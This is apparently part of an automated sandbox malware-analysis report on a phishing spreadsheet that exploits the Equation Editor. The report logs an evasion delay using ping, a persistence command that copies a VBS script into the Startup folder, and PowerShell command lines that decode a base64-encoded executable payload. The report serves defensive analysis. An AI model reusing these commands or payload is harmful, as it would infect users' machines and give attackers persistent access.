Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: RFQ PO9845.xlsxStream path '\x1Ole10NAtiVe' entropy: 7.99461390261 (max. 8.0)

Malware Analysis System Evasion

barindex
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10 Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2616Thread sleep time: -180000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3348Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3424Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_0273096A GetSystemInfo,11_2_0273096A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 3_2_0398610C mov edx, dword ptr fs:[00000030h]3_2_0398610C
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" [byte[]] $rowg = [system.convert]::frombase64string('tvqqaamaaaaeaaaa//8aalgaaaaaaaaaqaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaaaaa4fug4atannibgbtm0hvghpcybwcm9ncmftignhbm5vdcbizsbydw4gaw4gre9tig1vzguudq0kjaaaaaaaaabqrqaataedagxtf2qaaaaaaaaaaoaaaielavaaaeqaaaagaaaaaaaaammaaaagaaaagaaaaaaaeaagaaaaagaabaaaaaaaaaagaaaaaaaaaadaaaaaagaaaaaaaamayiuaabaaabaaaaaaeaaaeaaaaaaaabaaaaaaaaaaaaaaalbiaabpaaaaaiaaacgdaaaaaaaaaaaaaaaaaaaaaaaaakaaaawaaaaoygaahaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaiaaacaaaaaaaaaaaaaaaccaaaegaaaaaaaaaaaaaac50zxh0aaaacemaaaagaaaaraaaaaiaaaaaaaaaaaaaaaaaacaaagaucnnyywaaacgdaaaagaaaaaqaaabgaaaaaaaaaaaaaaaaaabaaabalnjlbg9jaaamaaaaakaaaaacaaaasgaaaaaaaaaaaaaaaaaaqaaaqgaaaaaaaaaaaaaaaaaaaadkygaaaaaaaegaaaacaauasdeaanguaaadaaaaaaaaacbgaaaiagaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaboosqaabioeaigbaaakkh4ckaqaaaoqabmwcabjaaaaaaaaahmfaaakgaeaaaqwkwewrqmaaaacaaaadwaaabwaaaarj3mgaaakgaiaaaqxk+bzbwaacoadaaaegcvtcwgaaaqabaaabbkrxioufgeaaarvcqaacioufgiaaarvcgaacioufgmaaarvcwaacioufgqaaarvdaaacir2fysbfiwafguaaaqukbsaaaosjhibaabwgyhkaaag0auaaaioeaaacm8caaakcx0aaaqabqaabh4faaaekhp+bgaabcoeaoagaaaeklzzdqaabigeaaakdayaaakabwaabcoeaigfaaakkhp+bwaabcoaka4aaayqhgioewaacioaabswdwdnbgaaaqaaesaadaaakcaaaaowkwewrqwaaaafaaaavweaagqbaaazagaaaqiaahocaaclagaa0wiaapgcaaavawaaaqmaaludaaa4dqyaahmhaaakjsgiaaakbymaaaockcqaaapyiqaacbsosgaabnitaabwgihkaaagbyuaaapymqaacbyosgaabni/aabwhihkaaagbyuaaapyqwaacbcosgaabnjpaabwhshkaaagbyuaaapyuwaacbyosgaabnjfaabwhchkaaagbyuaaapyywaacbgosgaabnj1aabwgihkaaagbyuaaapyeqaacboosgaabnklaabwhihkaaagbyuaaapyjwaacbwosgaabnkhaabwhchkaaagbyuaaapypqaacboosgaabnkxaabwfyhkaaagbyuaaapytqaacb4osgaabnlhaabwfyhkaaagbyuaaapyywaacbkosgaabnldaabwgyhkaaagbyuaaapy4qaacbcosgaabnlzaabwgchkaaagbyuaaapvjgaacgogbycaaaolfzh0/v//bygkaaakcxg4z/7//wnysqaacbcosgaabhyokaaacjoeaqaahxookqaacivy9waacboosgaabigqaaakewqsbp4wfqaaaw8raaakcvsaahaxkeoaaayokwaacgxybqeacbsosgaabigsaaakkaeaacstthmuaaakcy8aaaotbreff28waaakeqvyeqeacbwosgaabm8xaaakeqvyhqeacb0osgaabggomgaacm8zaaakjrefbzqaaapvnqaaciz+ngaacnl3aqbwfihkaaagf283aaakdrk4mp3//wlvoaaacnjtagbwhshkaaagkaiaacsteglyuwiacb0osgaabghvogaacglvowaacho4yv3//wcopaaacigwaaaggzhr/f//oageaaaecl0cahawkeoaaaywkcgaaao65gmaab8akckaaaotbhw4jv3//xegcz0aaapybqeacbsosgaabm8+aaakkamaacs6ogmaacgqaaakewqdopj8//8sbp4wfqaaaw8raaakcmecahaakeoaaayomgaachmhhjjt/p//eqzyawiacbsosgaabhehkd8aaaotcb8jolb8//9zlgaacnmvaaakewkrcrdvmaaachejcm8cahazkeoaaazvmqaachejcumcahabkeoaaayrccgyaaakbzmaaaoleqlvnaaacm81aaakjh8kogl8//8uewpyvqmacb4osgaabnjxawbwkeaaaaoodqaachmk3holkeeaaaotcxyrarysaisikeiaaaoxk/teabekob0caaauewwfczgw/p//eqoucnmdahazkeoaaayxjqyaaaelfnkrawbwgyhkaaagohqufchdaaakkeqaaapyoqmacbkosgaabheikeuaaaookgaacowvaaabkeyaaaotdrenkecaaaotdheokegaaao6haiaabekfhk9awbwgihkaaagf40gaaabjryrdqilew8ufbencaaaasuwf5wlexaoqwaacheqfpeshxepfpoodqaactadaaabkbaaaaoosqaacnqdaaabew4odqaachmmfisbfkugaaaabqaaadeaaacca
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" [byte[]] $rowg = [system.convert]::frombase64string('tvqqaamaaaaeaaaa//8aalgaaaaaaaaaqaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaaaaa4fug4atannibgbtm0hvghpcybwcm9ncmftignhbm5vdcbizsbydw4gaw4gre9tig1vzguudq0kjaaaaaaaaabqrqaataedagxtf2qaaaaaaaaaaoaaaielavaaaeqaaaagaaaaaaaaammaaaagaaaagaaaaaaaeaagaaaaagaabaaaaaaaaaagaaaaaaaaaadaaaaaagaaaaaaaamayiuaabaaabaaaaaaeaaaeaaaaaaaabaaaaaaaaaaaaaaalbiaabpaaaaaiaaacgdaaaaaaaaaaaaaaaaaaaaaaaaakaaaawaaaaoygaahaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaiaaacaaaaaaaaaaaaaaaccaaaegaaaaaaaaaaaaaac50zxh0aaaacemaaaagaaaaraaaaaiaaaaaaaaaaaaaaaaaacaaagaucnnyywaaacgdaaaagaaaaaqaaabgaaaaaaaaaaaaaaaaaabaaabalnjlbg9jaaamaaaaakaaaaacaaaasgaaaaaaaaaaaaaaaaaaqaaaqgaaaaaaaaaaaaaaaaaaaadkygaaaaaaaegaaaacaauasdeaanguaaadaaaaaaaaacbgaaaiagaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaboosqaabioeaigbaaakkh4ckaqaaaoqabmwcabjaaaaaaaaahmfaaakgaeaaaqwkwewrqmaaaacaaaadwaaabwaaaarj3mgaaakgaiaaaqxk+bzbwaacoadaaaegcvtcwgaaaqabaaabbkrxioufgeaaarvcqaacioufgiaaarvcgaacioufgmaaarvcwaacioufgqaaarvdaaacir2fysbfiwafguaaaqukbsaaaosjhibaabwgyhkaaag0auaaaioeaaacm8caaakcx0aaaqabqaabh4faaaekhp+bgaabcoeaoagaaaeklzzdqaabigeaaakdayaaakabwaabcoeaigfaaakkhp+bwaabcoaka4aaayqhgioewaacioaabswdwdnbgaaaqaaesaadaaakcaaaaowkwewrqwaaaafaaaavweaagqbaaazagaaaqiaahocaaclagaa0wiaapgcaaavawaaaqmaaludaaa4dqyaahmhaaakjsgiaaakbymaaaockcqaaapyiqaacbsosgaabnitaabwgihkaaagbyuaaapymqaacbyosgaabni/aabwhihkaaagbyuaaapyqwaacbcosgaabnjpaabwhshkaaagbyuaaapyuwaacbyosgaabnjfaabwhchkaaagbyuaaapyywaacbgosgaabnj1aabwgihkaaagbyuaaapyeqaacboosgaabnklaabwhihkaaagbyuaaapyjwaacbwosgaabnkhaabwhchkaaagbyuaaapypqaacboosgaabnkxaabwfyhkaaagbyuaaapytqaacb4osgaabnlhaabwfyhkaaagbyuaaapyywaacbkosgaabnldaabwgyhkaaagbyuaaapy4qaacbcosgaabnlzaabwgchkaaagbyuaaapvjgaacgogbycaaaolfzh0/v//bygkaaakcxg4z/7//wnysqaacbcosgaabhyokaaacjoeaqaahxookqaacivy9waacboosgaabigqaaakewqsbp4wfqaaaw8raaakcvsaahaxkeoaaayokwaacgxybqeacbsosgaabigsaaakkaeaacstthmuaaakcy8aaaotbreff28waaakeqvyeqeacbwosgaabm8xaaakeqvyhqeacb0osgaabggomgaacm8zaaakjrefbzqaaapvnqaaciz+ngaacnl3aqbwfihkaaagf283aaakdrk4mp3//wlvoaaacnjtagbwhshkaaagkaiaacsteglyuwiacb0osgaabghvogaacglvowaacho4yv3//wcopaaacigwaaaggzhr/f//oageaaaecl0cahawkeoaaaywkcgaaao65gmaab8akckaaaotbhw4jv3//xegcz0aaapybqeacbsosgaabm8+aaakkamaacs6ogmaacgqaaakewqdopj8//8sbp4wfqaaaw8raaakcmecahaakeoaaayomgaachmhhjjt/p//eqzyawiacbsosgaabhehkd8aaaotcb8jolb8//9zlgaacnmvaaakewkrcrdvmaaachejcm8cahazkeoaaazvmqaachejcumcahabkeoaaayrccgyaaakbzmaaaoleqlvnaaacm81aaakjh8kogl8//8uewpyvqmacb4osgaabnjxawbwkeaaaaoodqaachmk3holkeeaaaotcxyrarysaisikeiaaaoxk/teabekob0caaauewwfczgw/p//eqoucnmdahazkeoaaayxjqyaaaelfnkrawbwgyhkaaagohqufchdaaakkeqaaapyoqmacbkosgaabheikeuaaaookgaacowvaaabkeyaaaotdrenkecaaaotdheokegaaao6haiaabekfhk9awbwgihkaaagf40gaaabjryrdqilew8ufbencaaaasuwf5wlexaoqwaacheqfpeshxepfpoodqaactadaaabkbaaaaoosqaacnqdaaabew4odqaachmmfisbfkugaaaabqaaadeaaaccaJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\jyrthfdwrg.vbs" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\jyrthfdwrg.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ Wk.vbs')Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAGXtf2QAAAAAAAAAAOAAAiELAVAAAEQAAAAGAAAAAAAAAmMAAAAgAAAAgAAAAAAAEAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAADAAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAALBiAABPAAAAAIAAACgDAAAAAAAAAAAAAAAAAAAAAAAAAKAAAAwAAAAoYgAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAACEMAAAAgAAAARAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAACgDAAAAgAAAAAQAAABGAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAKAAAAACAAAASgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAADkYgAAAAAAAEgAAAACAAUASDEAANguAAADAAAAAAAAACBgAAAIAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABooSQAABioeAigBAAAKKh4CKAQAAAoqABMwCABJAAAAAAAAAHMFAAAKgAEAAAQWKwEWRQMAAAACAAAADwAAABwAAAArJ3MGAAAKgAIAAAQXK+BzBwAACoADAAAEGCvTcwgAAAqABAAABBkrxioufgEAAARvCQAACioufgIAAARvCgAACioufgMAAARvCwAACioufgQAAARvDAAACir2FysBFiwAfgUAAAQUKBsAAAosJHIBAABwGyhKAAAG0AUAAAIoEAAACm8cAAAKcx0AAAqABQAABH4FAAAEKhp+BgAABCoeAoAGAAAEKlZzDQAABigeAAAKdAYAAAKABwAABCoeAigfAAAKKhp+BwAABCoaKA4AAAYqHgIoEwAACioAABswDwDnBgAAAQAAESAADAAAKCAAAAoWKwEWRQwAAAAFAAAAVwEAAGQBAAAzAgAAaQIAAHoCAAClAgAA0wIAAPgCAAAVAwAAaQMAALUDAAA4dQYAAHMhAAAKJSgiAAAKbyMAAAoCKCQAAApyIQAAcBsoSgAABnItAABwGihKAAAGbyUAAApyMQAAcBYoSgAABnI/AABwHihKAAAGbyUAAApyQwAAcBcoSgAABnJPAABwHShKAAAGbyUAAApyUwAAcBYoSgAABnJfAABwHChKAAAGbyUAAApyYwAAcBgoSgAABnJ1AABwGihKAAAGbyUAAApyeQAAcBooSgAABnKLAABwHihKAAAGbyUAAApyjwAAcBwoSgAABnKhAABwHChKAAAGbyUAAApypQAAcBooSgAABnKxAABwFyhKAAAGbyUAAApytQAAcB4oSgAABnLHAABwFyhKAAAGbyUAAApyywAAcBkoSgAABnLdAABwGyhKAAAGbyUAAApy4QAAcBcoSgAABnLzAABwGChKAAAGbyUAAApvJgAACgoGbycAAAoLFzh0/v//BygkAAAKCxg4Z/7//wNysQAAcBcoSgAABhYoKAAACjoEAQAAHxooKQAACiVy9wAAcBooSgAABigqAAAKEwQSBP4WFQAAAW8RAAAKcvsAAHAXKEoAAAYoKwAACgxyBQEAcBsoSgAABigsAAAKKAEAACstTHMuAAAKcy8AAAoTBREFF28wAAAKEQVyEQEAcBwoSgAABm8xAAAKEQVyhQEAcB0oSgAABggoMgAACm8zAAAKJREFbzQAAApvNQAACiZ+NgAACnL3AQBwFihKAAAGF283AAAKDRk4mP3//wlvOAAACnJTAgBwHShKAAAGKAIAACstEglyUwIAcB0oSgAABghvOgAACglvOwAACho4Yv3//wcoPAAACigWAAAGGzhR/f//OAgEAAAEcl0CAHAWKEoAAAYWKCgAAAo65gMAAB8aKCkAAAoTBhw4Jv3//xEGcz0AAApyBQEAcBsoSgAABm8+AAAKKAMAACs6ogMAACgqAAAKEwQdOPj8//8SBP4WFQAAAW8RAAAKcmECAHAaKEoAAAYoMgAAChMHHjjT/P//EQZyawIAcBsoSgAABhEHKD8AAAoTCB8JOLb8//9zLgAACnMvAAAKEwkRCRdvMAAAChEJcm8CAHAZKEoAAAZvMQAAChEJcuMCAHAbKEoAAAYRCCgyAAAKbzMAAAolEQlvNAAACm81AAAKJh8KOGL8//8UEwpyVQMAcB4oSgAABnJxAwBwKEAAAAooDQAAChMK3holKEEAAAoTCxYrARYsAisIKEIAAAoXK/TeABEKOb0CAAAUEwwfCzgW/P//EQoUcnMDAHAZKEoAAAYXjQYAAAElFnKRAwBwGyhKAAAGohQUFChDAAAKKEQAAApyoQMAcBkoSgAABhEIKEUAAAooKgAACowVAAABKEYAAAoTDRENKEcAAAoTDhEOKEgAAAo6HAIAABEKFHK9AwBwGihKAAAGF40GAAABJRYRDqIlEw8UFBeNCAAAASUWF5wlExAoQwAAChEQFpEsHxEPFpooDQAACtAdAAABKBAAAAooSQAACnQdAAABEw4oDQAAChMMFisBFkUGAAAABQAAADEAAACCAJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\jyrthfdwrg.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ Wk.vbs')Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
